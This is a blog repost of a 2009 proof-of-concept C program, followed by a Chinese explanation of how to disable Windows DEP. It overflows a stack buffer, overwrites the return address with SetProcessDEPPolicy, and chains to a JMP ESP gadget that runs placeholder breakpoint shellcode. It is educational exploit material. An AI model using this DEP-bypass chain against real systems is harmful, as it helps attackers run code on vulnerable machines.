• [zz]DEP bypass with SetProcessDEPPolicy()


    1. /*
    2. This is a proof of concept of buffer overflow exploitation with DEP
    3. bypass on Windows XP Professional SP3 english updated on December 9,
    4. 2009 with DEP manually set to OptOut so enabled for all processes,
    5. except the ones that are put in the exception list and this program
    6. is not.
    7.  
    8. This source has been compiled with Microsoft Visual C++ 2008 Express
    9. Edition in Release mode with the default flags. This includes
    10. /NXCOMPAT and /GS.
    11.  
    12. Buffer Security Check (stack cookie, /GS flag) does not need to be
    13. bypassed because the string buffer, buf, in this example is long
    14. 4 bytes, so the compiler does not add the GS cookie to the
    15. useSetProcessDEPPolicy() function. Remember that strict_gs_check
    16. pragma by default is turned off.
    17.  
    18. References:
    19. * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
    20.   Server 2008' by Michael Howard,
    21.   http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
    22. * SetProcessDEPPolicy Function,
    23.   http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
    24.  
    25. Feel free to write me for comments and questions,
    26. Bernardo Damele A. G. <bernardo.damele@gmail.com>
    27. */
    28.  
    29.  
    30. #include <windows.h>
    31. #include <stdlib.h>
    32.  
    33.  
    34. void useSetProcessDEPPolicy()
    35. {
    36.     char buf[4];
    37.  
    38.     /* Overflow the string buffer and EBP register. */
    39.     strcpy(buf, "AAAABBBB");
    40.  
    41.     /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
    42.     Windows XP SP3 and Windows Server 2008 and can be abused by an
    43.     attacker while exploiting a buffer overflow vulnerability to disable
    44.     hardware-enforced DEP (NX/XD bit) for the running process.
    45.  
    46.     Overwrite EIP with the address of SetProcessDepPolicy() API, which
    47.     is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
    48.     December 9, 2009.
    49.  
    50.     NOTE: You might need to adapt it depending on your system patch
    51.     level. */
    52.     memcpy(buf+8, "\xa4\x22\x86\x7c", 4);
    53.  
    54.     /* Return address of SetProcessDepPolicy().
    55.     Use an address of a JMP ESP instruction in kernel32.dll to jump to our
    56.     shellcode on the top of the stack.
    57.  
    58.     NOTE: You might need to adapt it depending on your system patch
    59.     level. */
    60.     memcpy(buf+12, "\x13\x44\x87\x7c", 4);
    61.  
    62.     /* Argument for SetProcessDepPolicy().
    63.     0x00000000 turn off DEP for this process. */
    64.     memcpy(buf+16, "\x00\x00\x00\x00", 4);
    65.  
    66.     /* The shellcode to be executed after DEP has been disabled.
    67.     For instance, a breakpoint (INT 3 instruction) to call the
    68.     debug exception handler which will pause the process. */
    69.     memcpy(buf+20, "\xcc", 1);
    70. }
    71.  
    72.  
    73. int main()
    74. {
    75.     useSetProcessDEPPolicy();
    76.  
    77.     return 0;
    78. }
       
      利用SetProcessDEPPolicy来关闭DEP
      适用在:Windows XP SP3,Vista SP1 和Windows 2008。
      为了能使这个函数有效,当前的DEP 策略必须设成OptIn 或者OptOut。如果策略被设成
      AlwaysOn(或者AlwaysOff),然后SetProcessDEPPolicy 将会抛出一个错误。如果一个模块
      是以/NXCOMPAT 链接的,这个技术也将不会成功。最后,同等重要的是,它这能被进程调
      用一次。因此如果这个函数已经被当前进程调用(如IE8,当程序开始时已经调用它),它
      将不成功。
      Bernardo Damele 写了一篇关于这一技术的博文:
      http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
      函数原型如下:
      BOOLWINAPI SetprocessDEPPolicy(
        __in DWORD dwFlags
      );
      这个函数需要一个参数,并且这个参数必须设置为0,以此禁用当前进程的DEP。
      为了在ROP 链中使用这个函数,你需要在栈上这样设置:
      ●指向SetProcessDEPPolicy 的指针
      ●指向shellcode 的指针
      ●0
      指向shellcode 的指针用于确保当SetProcessDEPPolicy()执行完ROP链后会跳到shellcode。
      在XP SP3 下SetProcessDEPPolicy 的地址是7C8622A4(kernel32.dll)
      http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
  • 相关阅读:
    逻辑回归---sklearn
    逻辑回归---梯度下降法
    线回与非线回---线性回归标准方程法
    线回与非线回---sklearn--多项式回归
    线回与非线回---sklearn--多元线性回归
    web前端2020/1/20学习笔记
    web前端2020/1/18-2020/1/19学习笔记
    web前端2020/1/17学习笔记
    java2020/1/16学习笔记
    web前端2020/1/16学习笔记
  • 原文地址:https://www.cnblogs.com/moonflow/p/2529153.html
Copyright © 2020-2023  润新知